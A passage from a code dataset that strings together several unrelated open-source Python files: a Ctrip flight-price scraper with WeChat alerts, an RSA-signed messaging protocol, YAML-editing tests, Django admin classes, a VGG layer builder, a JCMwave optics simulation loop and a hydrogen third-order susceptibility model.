WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.chrome.options import Options\n\noptions = Options()\n# 设置 webdriver 无头运行\noptions.add_argument('--headless')\noptions.add_argument('--disable-gpu')\noptions.add_argument('--no-sandbox')\n# 初始化 webdriver\n# driver = webdriver.Chrome(\n# executable_path=\"./drivers/chromedriver.exe\",\n# chrome_options=chrome_options,\n# )\n\nWECHAT_MSG_URL = 'https://sctapi.ftqq.com/xxx.send'\nSEND_COUNT = 5\n# 屏蔽 https 证书报警信息\nurllib3.disable_warnings()\n\n# 定义 session 请求头,设置 UA\nheaders = {\n 'User-Agent': 'Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1'\n}\n\n# 定义异常数量全局变量\nEXCEPTION_COUNT = 0\n# 定义异常最大值全局变量\nMAX_EXCEPTION_COUNT = 1000\n\nparser = argparse.ArgumentParser(description='manual to this script')\nparser.add_argument(\"-leave\", type=str, default=\"SHA\")\nparser.add_argument(\"-reach\", type=str, default=\"CTU\")\nparser.add_argument(\"-date\", type=str, default=\"2022-01-28\")\nparser.add_argument(\"-price\", type=float, default=0)\nargs = parser.parse_args()\n\nLEAVE_LOCATION = args.leave.upper()\nREACH_LOCATION = args.reach.upper()\nTARGET_DATE = [int(x) for x in args.date.split('-')]\nTARGET_PRICE = args.price\nDATE_LIST = [str(date(*TARGET_DATE))] + [\n str(date(*TARGET_DATE) + timedelta(days=x)) for x in (-1, 1)\n]\n\nresult = defaultdict(list)\n# mention_list = defaultdict(list)\n\n# 记录抓取异常\ndef record_exception_count(err):\n print(err)\n global EXCEPTION_COUNT\n EXCEPTION_COUNT += 1\n # 抓取异常次数达到最大值时抛出异常\n if EXCEPTION_COUNT > MAX_EXCEPTION_COUNT:\n print(\"exceed max exception count\")\n raise RuntimeError\n\n\n# 初始化 chromedriver 获取首页 cookie\ndef init_driver(date, driver):\n driver.get(\n f\"https://m.ctrip.com/html5/flight/swift/domestic/{LEAVE_LOCATION}/{REACH_LOCATION}/{date}\"\n )\n\n try:\n # waitting for alert dialog.\n WebDriverWait(driver, 10).until(\n EC.presence_of_element_located(\n (By.XPATH, '//*[@id=\"app\"]/div/div[1]/div/div[2]/div[2]/ul/li/div')\n )\n )\n\n btn_known = driver.find_element_by_xpath(\n '//*[@id=\"app\"]/div/div[1]/div/div[2]/div[2]/ul/li/div/div[4]/div'\n )\n btn_known.click()\n except:\n pass\n\n # scroll to bottom 
of the page\n sleep(5)\n driver.execute_script(\"window.scrollTo(0, document.body.scrollHeight);\")\n sleep(5)\n return driver.page_source\n\n\ndef parse_html(date, html, mention_list):\n selector = etree.HTML(html)\n card_list = selector.xpath('//div[@class=\"card-item-content\"]')\n min_price = [999999, 999999, 999999]\n min_three = []\n print(datetime.now(), date, len(card_list))\n for card in card_list:\n try:\n depart_node = card.xpath('div//div[@class=\"flight-depart\"]')[0]\n dest_node = card.xpath('div//div[@class=\"flight-dest\"]')[0]\n price_node = card.xpath('div//div[@class=\"flight-price\"]')[0]\n plane_node = card.xpath('div[@class=\"flight-plane\"]//span/text()')\n middle_node = card.xpath(\n 'div/div/div//span[@class=\"icon-arrow-state\"]//span/text()'\n )\n rest_ticket = price_node.xpath('div/span[@class=\"ticket-inventory\"]/text()')\n except Exception as err:\n record_exception_count(err)\n continue\n\n price = float(price_node.xpath('div[1]/strong/text()')[0])\n if price and price > TARGET_PRICE * 2:\n continue\n data = {\n 'depart_time': depart_node.xpath('div[@class=\"flight-time\"]/text()')[\n 0\n ].strip(),\n 'depart_airport': '-'.join(\n depart_node.xpath('div[@class=\"flight-airport\"]/span/text()')\n ),\n 'dest_time': dest_node.xpath('div[@class=\"flight-time\"]/text()')[0].strip(),\n 'dest_airport': '-'.join(\n [x.strip() for x in dest_node.xpath('div[2]/span/text()') if x.strip()]\n ),\n 'middle': '-'.join(middle_node),\n 'price': str(price),\n 'rest_ticket': str(rest_ticket and rest_ticket[0].strip()),\n 'discount': price_node.xpath('div[2]/text()')[0].strip()\n if price_node.xpath('div[2]/text()')\n else price_node.xpath('div[2]//span[@class=\"ticket-right\"]/text()')[\n 0\n ].strip(),\n 'airplane': str([x.strip() for x in plane_node if x.strip()]),\n }\n # result[date].append(data)\n if price <= TARGET_PRICE:\n mention_list[date].append(data)\n if price < min_price[0]:\n min_price.insert(0, price)\n min_three.insert(0, data)\n elif price < min_price[1]:\n min_price.insert(1, price)\n min_three.insert(1, data)\n elif price < min_price[2]:\n min_price.insert(2, price)\n min_three.insert(2, data)\n min_price = min_price[:3]\n min_three = min_three[:3]\n if not (mention_list[date] or TARGET_PRICE):\n mention_list[date] = min_three\n\n\ndef run_spider():\n driver = webdriver.Chrome(\n executable_path=\"./drivers/chromedriver_linux\", options=options\n # executable_path=\"./drivers/chromedriver\", options=options\n )\n mention_list = defaultdict(list)\n for _date in DATE_LIST:\n page_html = init_driver(_date, driver)\n parse_html(_date, page_html, mention_list)\n sleep(10)\n driver.quit()\n global SEND_COUNT\n table_data = []\n for _date, lines in mention_list.items():\n for line in lines:\n table_data.append(f\"| {_date} | { ' | '.join(line.values()) } |\")\n if not table_data:\n return\n today = str(date.today())\n with open('record', 'r') as fs:\n record = fs.read()\n if str({today: mention_list}) == record:\n return\n with open('record', 'w') as fs:\n fs.write(str({today: mention_list}))\n r.post(\n WECHAT_MSG_URL,\n params={\n 'title': '有新的航班可以购入',\n 'desp': \"\"\"\n| Date | depart_time | depart_airport | dest_time | dest_airport | middle | price | rest_ticket | discount | airplane |\n| --- | --- | --- | --- | --- | --- | --- | --- | --- | --- |\n{}\n\"\"\".format(\n '\\n'.join(table_data)\n ),\n 'channel': 9,\n },\n )\n SEND_COUNT -= 1\n\n\ndef time_scheduler():\n global SEND_COUNT\n\n while True:\n if 23 > datetime.now().hour > 8:\n if SEND_COUNT:\n 
run_spider()\n sleep(30 * 60)\n continue\n print(\"day off\")\n SEND_COUNT = 5\n sleep(30 * 60)\n\n\nif __name__ == '__main__':\n time_scheduler()\n","repo_name":"KrisShin/ctrip_mention","sub_path":"ctrip_spider.py","file_name":"ctrip_spider.py","file_ext":"py","file_size_in_byte":7201,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"14065483525","text":"from Stack import Solution\nimport sys\n\ndef main():\n calculator = Solution()\n for expression in sys.stdin:\n try:\n if expression == 'exit\\n':\n return 0\n \n result = calculator.calculate(expression)\n print(result)\n except:\n print(\"Wrong Expression.\")\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"yichigo/Algorithms","sub_path":"Calculator.py","file_name":"Calculator.py","file_ext":"py","file_size_in_byte":376,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"16268496686","text":"import struct\nfrom abc import ABC, abstractmethod\nfrom enum import Enum\nfrom typing import Iterable, Tuple\n\nfrom cryptography.exceptions import InvalidSignature\nfrom cryptography.hazmat.primitives import hashes\nfrom cryptography.hazmat.primitives.asymmetric import padding\n\n\nclass Message:\n author_public_key: None\n message: bytes\n verified: bool\n\n @staticmethod\n def construct(message: bytes, recipient_public_key, author_private_key) -> bytes:\n encrypted_message = recipient_public_key.encrypt(\n message,\n padding.OAEP(\n mgf=padding.MGF1(algorithm=hashes.SHA256()),\n algorithm=hashes.SHA256(),\n label=None,\n ),\n )\n\n signature = author_private_key.sign(\n message,\n padding.PSS(\n mgf=padding.MGF1(algorithm=hashes.SHA256()),\n salt_length=padding.PSS.MAX_LENGTH\n ),\n hashes.SHA256(),\n )\n signature_len = len(signature)\n message_len = len(encrypted_message)\n signed_message = struct.pack(f\"!I{signature_len}s{message_len}s\", signature_len, signature, encrypted_message)\n return signed_message\n\n @classmethod\n def deconstruct(cls, signed_message: bytes, author_public_key, recipient_private_key) -> 'Message':\n current_pos = 0\n signature_len = struct.unpack(\"!I\", signed_message[current_pos: current_pos + 4])[0]\n current_pos += 4\n signature = struct.unpack(f\"!{signature_len}s\", signed_message[current_pos: current_pos + signature_len])[0]\n current_pos += signature_len\n encrypted_message = signed_message[current_pos:]\n\n message = recipient_private_key.decrypt(\n encrypted_message,\n padding.OAEP(\n mgf=padding.MGF1(algorithm=hashes.SHA256()),\n algorithm=hashes.SHA256(),\n label=None,\n )\n )\n\n try:\n author_public_key.verify(\n signature,\n message,\n padding.PSS(\n mgf=padding.MGF1(hashes.SHA256()),\n salt_length=padding.PSS.MAX_LENGTH,\n ),\n hashes.SHA256(),\n )\n except InvalidSignature:\n obj = cls()\n obj.message = None\n obj.verified = False\n return obj\n\n obj = cls()\n obj.message = message\n obj.verified = True\n obj.author_public_key = author_public_key\n return obj\n\n\nclass InteractionType(Enum):\n REQUEST = 1\n RESPONSE = 2\n\n\nclass CommandType(Enum):\n SEND_MESSAGE = 1\n GET_CLIENTS = 2\n GET_MESSAGES = 3\n\n\nclass Command(ABC):\n @abstractmethod\n def to_bytes(self) -> bytes:\n pass\n\n @classmethod\n @abstractmethod\n def from_bytes(\n cls, interaction_type: InteractionType, data_bytes: bytes\n ) -> \"Command\":\n pass\n\n\ndef command_type(_type: CommandType):\n if _type in Protocol._COMMAND_FACTORY:\n raise ValueError(\n f\"{_type} is already set for 
{Protocol._COMMAND_FACTORY[_type]}\"\n )\n\n def decorator(cls):\n Protocol._COMMAND_FACTORY[_type] = cls\n return cls\n\n return decorator\n\n\nclass Protocol(Command):\n _COMMAND_FACTORY = {}\n\n def __init__(self, command: CommandType, info: Command, public_key: str, salt: int):\n self.command = command\n self.info = info\n self.public_key = public_key\n self.salt = salt\n\n def to_bytes(self) -> bytes:\n info_bytes = self.info.to_bytes()\n public_key = self.public_key.encode()\n public_key_length = len(public_key)\n return (\n struct.pack(\n f\"!HII{public_key_length}s\",\n self.command.value,\n public_key_length,\n self.salt,\n public_key,\n )\n + info_bytes\n )\n\n @classmethod\n def from_bytes(\n cls, interaction_type: InteractionType, data_bytes: bytes\n ) -> \"Protocol\":\n current_position = 0\n command_type_number = struct.unpack(\"!H\", data_bytes[current_position:2])[0]\n current_position += 2\n public_key_length, salt = struct.unpack(\n \"!II\", data_bytes[current_position : current_position + 8]\n )\n current_position += 8\n public_key = struct.unpack(\n f\"!{public_key_length}s\",\n data_bytes[current_position : current_position + public_key_length],\n )[0]\n current_position += public_key_length\n info_bytes = data_bytes[current_position:]\n\n command_type = CommandType(command_type_number)\n command_class: Command = cls._COMMAND_FACTORY.get(command_type)\n info = command_class.from_bytes(interaction_type, info_bytes)\n return Protocol(command_type, info, public_key.decode(), salt)\n\n\n@command_type(CommandType.SEND_MESSAGE)\nclass SendMessageCommand(Command):\n def __init__(self, message: bytes, recipient):\n self.message = message\n self.recipient = recipient\n\n def to_bytes(self) -> bytes:\n recipient = self.recipient.encode()\n message_len = len(self.message)\n recipient_len = len(recipient)\n return struct.pack(\n f\"!II{recipient_len}s{message_len}s\",\n recipient_len,\n message_len,\n recipient,\n self.message,\n )\n\n @classmethod\n def from_bytes(\n cls, interaction_type: InteractionType, data_bytes\n ) -> \"SendMessageCommand\":\n recipient_len, message_len = struct.unpack(\"!II\", data_bytes[:8])\n recipient, message = struct.unpack(\n f\"!{recipient_len}s{message_len}s\", data_bytes[8:]\n )\n return cls(message, recipient.decode())\n\n\n@command_type(CommandType.GET_CLIENTS)\nclass GetClientsCommand(Command):\n def __init__(\n self, interaction_type: InteractionType, clients: Iterable[str] = None\n ):\n self._interaction_type = interaction_type\n self.clients = clients or []\n\n def to_bytes(self) -> bytes:\n if self._interaction_type == InteractionType.REQUEST:\n return b\"\"\n encoded_clients = []\n for client in self.clients:\n client_length = len(client)\n encoded_clients.append(\n struct.pack(f\"!I{client_length}s\", client_length, client.encode())\n )\n\n return struct.pack(\"!I\", len(self.clients)) + b\"\".join(encoded_clients)\n\n @classmethod\n def from_bytes(\n cls, interaction_type: InteractionType, data_bytes: bytes\n ) -> \"GetClientsCommand\":\n if interaction_type == InteractionType.REQUEST:\n return cls(interaction_type=InteractionType.REQUEST)\n current_position = 0\n clients_number = struct.unpack(\n \"!I\", data_bytes[current_position : current_position + 4]\n )[0]\n current_position += 4\n clients = []\n for i in range(clients_number):\n client_length = struct.unpack(\n \"!I\", data_bytes[current_position : current_position + 4]\n )[0]\n current_position += 4\n client = struct.unpack(\n f\"!{client_length}s\",\n 
data_bytes[current_position : current_position + client_length],\n )[0]\n current_position += client_length\n clients.append(client.decode())\n return cls(interaction_type=InteractionType.RESPONSE, clients=clients)\n\n\n@command_type(CommandType.GET_MESSAGES)\nclass GetMessagesCommand(Command):\n def __init__(\n self,\n interaction_type: InteractionType,\n messages: Iterable[Tuple[bytes, str]] = None,\n ):\n self.interaction_type = interaction_type\n self.messages = messages or []\n\n def to_bytes(self) -> bytes:\n if self.interaction_type == InteractionType.REQUEST:\n return b\"\"\n encoded_messages = []\n for message, author in self.messages:\n author = author.encode()\n encoded_messages.append(\n struct.pack(\n f\"!II{len(author)}s{len(message)}s\",\n len(author),\n len(message),\n author,\n message,\n )\n )\n\n return struct.pack(\"!I\", len(self.messages)) + b\"\".join(encoded_messages)\n\n @classmethod\n def from_bytes(\n cls, interaction_type: InteractionType, data_bytes: bytes\n ) -> \"GetMessagesCommand\":\n if interaction_type == InteractionType.REQUEST:\n return cls(interaction_type=InteractionType.REQUEST)\n current_position = 0\n messages_number = struct.unpack(\n \"!I\", data_bytes[current_position : current_position + 4]\n )[0]\n current_position += 4\n messages = []\n for i in range(messages_number):\n author_length, message_length = struct.unpack(\n \"!II\", data_bytes[current_position : current_position + 8]\n )\n current_position += 8\n author, message = struct.unpack(\n f\"!{author_length}s{message_length}s\",\n data_bytes[\n current_position : current_position + author_length + message_length\n ],\n )\n current_position += author_length + message_length\n messages.append((message, author.decode()))\n return cls(interaction_type=InteractionType.RESPONSE, messages=messages)\n","repo_name":"ArtemTolstoguzov/ds","sub_path":"message.py","file_name":"message.py","file_ext":"py","file_size_in_byte":9560,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"36237569036","text":"from textwrap import dedent\n\nimport yaml\n\nfrom peru import edit_yaml\nimport shared\n\nyaml_template = dedent(\"\"\"\\\n a:\n b: [1, 2, 3]\n c: {}\n d: blarg\n \"\"\")\n\n\nclass EditYamlTest(shared.PeruTest):\n def test_replace(self):\n start_yaml = yaml_template.format(\"foo\")\n new_yaml = edit_yaml.set_module_field(start_yaml, \"a\", \"c\", \"bar\")\n self.assertEqual(yaml_template.format(\"bar\"), new_yaml)\n\n def test_insert(self):\n start_yaml = dedent(\"\"\"\\\n a:\n b: foo\n \"\"\")\n new_yaml = edit_yaml.set_module_field(start_yaml, \"a\", \"c\", \"bar\")\n self.assertEqual(start_yaml + \" c: bar\\n\", new_yaml)\n\n def test_insert_number_looking_fields(self):\n # These all need to be quoted, or else YAML will interpret them as\n # literal ints and floats.\n start_yaml = dedent('''\\\n a:\n b: foo\n ''')\n intermediate = edit_yaml.set_module_field(start_yaml, 'a', 'c', '5')\n new_yaml = edit_yaml.set_module_field(intermediate, 'a', 'd', '.0')\n expected_yaml = start_yaml + ' c: \"5\"\\n d: \".0\"\\n'\n self.assertEqual(expected_yaml, new_yaml)\n self.assertDictEqual(\n yaml.safe_load(new_yaml),\n {'a': {\n 'b': 'foo',\n 'c': '5',\n 'd': '.0',\n }})\n\n def test_insert_with_last_field_as_dict(self):\n start_yaml = dedent(\"\"\"\\\n a:\n b:\n foo: bar\n baz: bing\n x: y\n \"\"\")\n end_yaml = dedent(\"\"\"\\\n a:\n b:\n foo: bar\n baz: bing\n c: stuff\n x: y\n \"\"\")\n edited_yaml = edit_yaml.set_module_field(start_yaml, \"a\", 
\"c\", \"stuff\")\n self.assertEqual(end_yaml, edited_yaml)\n\n def test_with_file(self):\n tmp_name = shared.tmp_file()\n start_yaml = yaml_template.format(\"foo\")\n with open(tmp_name, \"w\") as f:\n f.write(start_yaml)\n edit_yaml.set_module_field_in_file(tmp_name, \"a\", \"c\", \"bar\")\n with open(tmp_name) as f:\n new_yaml = f.read()\n self.assertEqual(yaml_template.format(\"bar\"), new_yaml)\n","repo_name":"buildinspace/peru","sub_path":"tests/test_edit_yaml.py","file_name":"test_edit_yaml.py","file_ext":"py","file_size_in_byte":2266,"program_lang":"python","lang":"en","doc_type":"code","stars":1088,"dataset":"github-code","pt":"35"} +{"seq_id":"33244002615","text":"from django.contrib import admin\n\nfrom texts.models import LenguaText, OriginalText, Suggestion, SmartText\n\n\n@admin.register(LenguaText)\nclass LenguaTextManagement(admin.ModelAdmin):\n list_display = ('uuid', 'values')\n search_fields = ('uuid', 'values')\n\n\n@admin.register(SmartText)\nclass SmartTextManagement(admin.ModelAdmin):\n readonly_fields = ('language', 'text_origin', 'count')\n list_display = ('count', 'text', 'language')\n search_fields = ('count', 'text', 'language')\n\n\n@admin.register(OriginalText)\nclass OriginalTextManagement(admin.ModelAdmin):\n readonly_fields = ('original', 'text', 'count')\n list_display = ('count', 'original')\n search_fields = ('count', 'original')\n\n\n@admin.register(Suggestion)\nclass SuggestionManagement(admin.ModelAdmin):\n readonly_fields = ('original', 'translation', 'count')\n list_display = ('original', 'translation', 'user_translation', 'from_language', 'to_language', 'count')\n list_filter = ('original', 'translation', 'user_translation', 'from_language', 'to_language', 'count')\n search_fields = ('original', 'translation', 'user_translation')\n","repo_name":"Yonimdo/yify-translator","sub_path":"texts/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1125,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"6981290432","text":"import numpy as np\nimport jcmwave,time,imp,shutil,os \nfrom optparse import OptionParser\nAOI = [20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45]\n\nlams = [214,215,217,218,219,220,221,222]\n#azimuths = [0,2,4,6,8,10,12,14,16,18,20,22,24,26,28,30,32,34,36,38,40,42,44,46,48,50,52,54,56,58,60,62,64,66,68,70,72,74,76,78,80,82,84,86,88,90,92,94,96,98,100,102,104,106,108,110,112,114,116,118,120,122,124,126,128,130,132,134,136,138,140,142,144,146,148,150,152,154,156,158,160,162,164,166,168,170,172,174,176,178,180,182,184,186,188,190,192,194,196,198,200,202,204,206,208,210,212,214,216,218,220,222,224,226,228,230,232,234,236,238,240,242,244,246,248,250,252,254,256,258,260,262,264,266,268,270,272,274,276,278,280,282,284,286,288,290,292,294,296,298,300,302,304,306,308,310,312,314,316,318,320,322,324,326,328,330,332,334,336,338,340,342,344,346,348,350,352,354,356,358,360]\nkeys = {} # Create empty dictionary for keys\nfor lam in lams:\n for ang in AOI:\n parser = OptionParser()\n parser.add_option(\"-t\", \"--threads\",\n action=\"store\",type=\"int\", dest=\"threads\",\n help=\"number of threads to use\")\n (options, args) = parser.parse_args()\n\n jcmwave.set_num_threads(options.threads)\n \n keys = {} # Create empty dictionary for keys\n results = [] # Create empty array for results\n tic = time.time() # use time() not clock() on linux system \n # Set simulation parameters\n \n keys = {\n 'AOI': ang,\n 'radius': 50,\n 'vacuum_wavelength': 
lam*1e-9,\n 'uol': 1e-9,\n 'display_triangulation' : 'no',\n 'boundary' : 'Periodic',\n 'info_level' : -1,\n 'fem_degree' : 2,\n 'n_refinement_steps' : 0, # Currently we get non-physical results if this is >0\n 'thickness' : 50,\n 'pitch' : 175, # pitch of square lattice (gammadion)\n 'z_radius' : 5, # radius of curvature of dimer in z plane\n 'z_radius_MSL' : 1 # maximum side length of z radius\n }\n\n\n tag_ = 'other_rotations_MM_NSL_hexagonal_lattice_radius_' + str(keys['radius']) + '_nm_structure_thickness_' + str(keys['thickness']) + '_nm_pitch_' + str(keys['pitch']) + '_wavelength_' + str(keys['vacuum_wavelength']) +'nm_' + str(keys['AOI']) +'AOI'\n\n\n\n # material properties\n keys['n_3'] = 1.00 # index refraction of Air\n\n \n Au_nk = np.loadtxt('../data/Al_OMEL_mfp.nk') #Al not GOLD!!!!!!!!!!!!!!!!!!!!!!!\n wl_Au_data = []; n_Au_real = []; n_Au_imag = []\n for data in Au_nk:\n wl_Au_data.append(data[0]*1e-9) # e-10 for [ang], e-9 for [nm], e-6 for [um]\n n_Au_real.append(data[1])\n n_Au_imag.append(data[2])\n\n \n # material properties\n keys['n_3'] = 1.00 # index refraction of Air\n\n \n azimuths = np.linspace(30, 90, 31)\n for keys['azimuth'] in azimuths:\n #print('Wavelength : %3.2f nm' % (keys['vacuum_wavelength']*1e9))\n keys['n_2'] = np.interp(keys['vacuum_wavelength'], wl_Au_data, n_Au_real) + 1j*np.interp(keys['vacuum_wavelength'], wl_Au_data, n_Au_imag)\n keys['sm_filename'] = '\"'+'project_results/sm.jcm\"'\n jcmwave.jcmt2jcm('./boundary_conditions.jcmt', keys)\n jcmwave.jcmt2jcm('./materials.jcmt', keys)\n jcmwave.jcmt2jcm('./project.jcmpt', keys)\n jcmwave.jcmt2jcm('./sources.jcmt', keys)\n jcmwave.jcmt2jcm('./layout.jcmt', keys)\n jcmwave.solve('./project.jcmp')\n \n ## Gather Reflected Fourier Modes (Z)\n filename_fourierModes_r = './project_results/fourier_modes_r.jcm';\n fourierModes_r = jcmwave.loadtable(filename_fourierModes_r,format='named')\n powerFlux_r = jcmwave.convert2powerflux(fourierModes_r)\n\n ## Reflected flux in normal direction\n P_s_t = np.sum(powerFlux_r['PowerFluxDensity'][0][:, 2]);\n P_p_t = np.sum(powerFlux_r['PowerFluxDensity'][1][:, 2]); \n\n \n filename_MM = './project_results/sm.jcm'\n\n print(filename_MM)\n table = jcmwave.loadtable(filename_MM)\n m11 = table['Mueller_xy11'][0]\n m12 = table['Mueller_xy12'][0]\n m13 = table['Mueller_xy13'][0]\n m14 = table['Mueller_xy14'][0]\n m21 = table['Mueller_xy21'][0]\n m22 = table['Mueller_xy22'][0]\n m23 = table['Mueller_xy23'][0]\n m24 = table['Mueller_xy24'][0]\n m31 = table['Mueller_xy31'][0]\n m32 = table['Mueller_xy32'][0]\n m33 = table['Mueller_xy33'][0]\n m34 = table['Mueller_xy34'][0]\n m41 = table['Mueller_xy41'][0]\n m42 = table['Mueller_xy42'][0]\n m43 = table['Mueller_xy43'][0]\n m44 = table['Mueller_xy44'][0]\n\n \n \n\n # save data to file\n results.append([keys['vacuum_wavelength'], keys['pitch'], keys['AOI'], keys['azimuth'], P_s_t, P_p_t,m11, m12, m13, m14, m21, m22, m23, m24, m31, m32, m33, m34, m41, m42, m43, m44])\n np.savetxt('./my_results' + tag_ + '.txt', results, header='wvl[m], pitch, AOI, Azimuth, Transm_Pol-1, Transm_Pol-2, m11, m12, m13, m14, m21, m22, m23, m24, m31, m32, m33, m34, m41, m42, m43, m44')\n \n toc = time.time() # use time() not clock() on linux system \n t = toc-tic\n print (\"Total runtime for \"+tag_+\": %6.4f s\" % t)\n 
\n","repo_name":"ColtonDaCoder/Chiral_Nanoparticles","sub_path":"run_simulation.py","file_name":"run_simulation.py","file_ext":"py","file_size_in_byte":5573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"23679785682","text":"import torch.nn as nn\n\n\n# borrowed from https://github.com/amdegroot/ssd.pytorch/blob/master/ssd.py\ndef vgg(cfg, batch_norm=False):\n layers = []\n in_channels = 3\n for v in cfg:\n if v == 'M':\n layers += [nn.MaxPool2d(kernel_size=2, stride=2)]\n elif v == 'C':\n layers += [nn.MaxPool2d(kernel_size=2, stride=2, ceil_mode=True)]\n else:\n conv2d = nn.Conv2d(in_channels, v, kernel_size=3, padding=1)\n if batch_norm:\n layers += [conv2d, nn.BatchNorm2d(v), nn.ReLU(inplace=True)]\n else:\n layers += [conv2d, nn.ReLU(inplace=True)]\n in_channels = v\n pool5 = nn.MaxPool2d(kernel_size=3, stride=1, padding=1)\n conv6 = nn.Conv2d(512, 1024, kernel_size=3, padding=6, dilation=6)\n conv7 = nn.Conv2d(1024, 1024, kernel_size=1)\n layers += [pool5, conv6,\n nn.ReLU(inplace=True), conv7, nn.ReLU(inplace=True)]\n return layers","repo_name":"quic/aimet-model-zoo","sub_path":"aimet_zoo_torch/ssd_mobilenetv2/model/vision/nn/vgg.py","file_name":"vgg.py","file_ext":"py","file_size_in_byte":960,"program_lang":"python","lang":"en","doc_type":"code","stars":237,"dataset":"github-code","pt":"37"} +{"seq_id":"18635739777","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Feb 5 22:21:16 2018\n\n@author: Main\nmodel of third order susptability in hydrogen\n\"\"\"\nfrom time import strftime\nimport itertools\nimport pickle\nimport numpy as np\nimport sympy as sp\nfrom sympy import init_printing\nfrom sympy.functions import conjugate\nfrom sympy.physics.hydrogen import R_nl\nfrom sympy.physics.hydrogen import E_nl\nfrom sympy.functions.special.spherical_harmonics import Ynm\nimport scipy.constants as constants\ninit_printing()\n\ndef hydrogen_omega_matrix(basis):\n \"\"\"\n Uses sympy to calculate and return the matrix representation of the omega matrix, the matrix of\n einstien frequencies in atomic units hbar = m_e = e = 1\n \n Parameters\n ----------\n basis: iterable of tuples\n each tuple defines a state of hydrogen to use in calculating the matrix. The number of tuples\n is the number of rows and columns in the returned matrices. Each tuple has 3 entries (n, l, m)\n where n is the principle quantum number, l is the total angular momentum quantum number, and\n m is the magnetic quantum number.\n \n Returns\n -------\n sp.Matrix\n This is the omega matrix for hydrogen given the basis set used\n \"\"\"\n E_basis = [E_nl(n) for n, l, m in basis]\n return sp.Matrix([[E_f - E_i for E_f in E_basis] for E_i in E_basis])\n\ndef hydrogen_dipole_matrix(basis):\n \"\"\"\n Uses sympy to calculate an return the matrix representation of the dipole vector operator in the\n hydrogen basis set in atomic units for x, y, z coordinates.\n \n Parameters\n ----------\n basis: iterable of tuples\n each tuple defines a state of hydrogen to use in calculating the matrix. The number of tuples\n is the number of rows and columns in the returned matrices. 
Each tuple has 3 entries (n, l, m)\n where n is the principle quantum number, l is the total angular momentum quantum number, and\n m is the magnetic quantum number.\n \n Returns\n -------\n list of matrices\n Returns 3 sp.Matrix objects representing the dipole vector operator in the x, y, and z\n cartesian coordinates respectively \n \"\"\"\n # define vars\n r, theta, phi = sp.symbols(\"r, theta, phi\", real=True)\n \n # define transformations to cartiesian and the dipole operators\n z = r*sp.cos(theta)\n x = r*sp.sin(theta)*sp.cos(phi)\n y = r*sp.sin(theta)*sp.sin(phi)\n \n # define basis in atomic units\n print(\"making basis wavefunctions\")\n H_nlm = [(R_nl(n, l, r)*sp.simplify(Ynm(l, m, theta, phi).expand(func=True)), (n, l, m))\n for n, l, m in basis]\n \n # find dipole transition matrix elements: H_init = inital hydrogen orbital, H_final = final hydrogen orbital \n mu = []\n element = lambda H_final, op, H_init: sp.integrate(H_final*op*H_init*sp.sin(theta)*r**2, (r, 0, sp.oo), (theta, 0, sp.pi), (phi, 0, 2*sp.pi))\n select_rules = lambda basis_f, basis_i: True#all([abs(basis_f[1] - basis_i[1]) == 1, abs(basis_f[2] - basis_i[2]) >= 1])\n print(\"Computing matrix elements\")\n for mu_oper in [x, y, z]:\n mu.append(sp.Matrix([[element(conjugate(bra), mu_oper, ket) \n if select_rules(basis_f, basis_i) else 0\n for bra, basis_f in H_nlm] \n for ket, basis_i in H_nlm]))\n return mu\n\ndef decay_rate_estimates(omega, dipole_vector, alpha=1/137.035999139, c=137.035999139, n=1):\n \"\"\"\n Estimates the decay rate matrix (gamma matrix) using expressions for spontaneous emission rates\n given the omega matrix, and dipole_vector matrix. Assumes hartree atomic units.\n \n Parameters\n ----------\n omega: sympy Matrix\n the matrix of einstien frequencies for a given transition between two states\n dipole_vector: tuple of three sympy Matrices\n the matrix representation of the dipole vector operator being used\n alpha: float\n The fine structure constant\n c: float\n The speed of light\n n: float\n The index of refraction\n \n Returns\n -------\n sympy Matrix\n The decay rate matrix (gamma matrix) using the rate of spontaneous emission as the estimator\n \"\"\"\n dipole = lambda m, n: sum([abs(dipole_vector[xyz][m, n])**2 for xyz in range(3)])\n \n return sp.Matrix([[(4*alpha*n*dipole(j, i)*omega[j, i]**3)/(3*c**2)\n for i in range(omega.shape[1])] # col index\n for j in range(omega.shape[0])]) # row index\n\ndef chi_3(k, i, j, h, omw_r, omw_q, omw_p, dipole, relax_gamma, density_matrix, omega_matrix):\n \"\"\"\n Computes elements of the 2nd hyperpolarizability using Boyd's quantum discription of chi3\n (Nonlinear Optics 3rd ed pg 182).\n \"\"\"\n numb_of_states = density_matrix.shape[0]\n cartiesian_indices = [i, j, h]\n lights_omegas = [omw_r, omw_q, omw_p]\n chi3_kijk = 0\n \n def chi_3_no_permuations(xyz, omegas, numb_states):\n chi3_temp = 0\n for n in range(numb_states):\n for m in range(numb_states):\n for v in range(numb_states):\n for l in range(numb_states):\n a = (density_matrix[m, m] - density_matrix[l, l]) \\\n *(dipole[k][m, n]*dipole[xyz[1]][n, v]*dipole[xyz[0]][v, l]*dipole[xyz[2]][l, m]) \\\n /((omega_matrix[n, m] - omegas[2] - omegas[1] - omegas[0] - sp.I*relax_gamma[n, m]) \\\n *(omega_matrix[v, m] - omegas[2] - omegas[1] - sp.I*relax_gamma[v, m]) \\\n *(omega_matrix[l, m] - omegas[2] - sp.I*relax_gamma[l, m]))\n \n b = (density_matrix[l, l] - density_matrix[v, v]) \\\n *(dipole[k][m, n]*dipole[xyz[1]][n, v]*dipole[xyz[0]][l, m]*dipole[xyz[2]][v, l]) \\\n /((omega_matrix[n, m] 
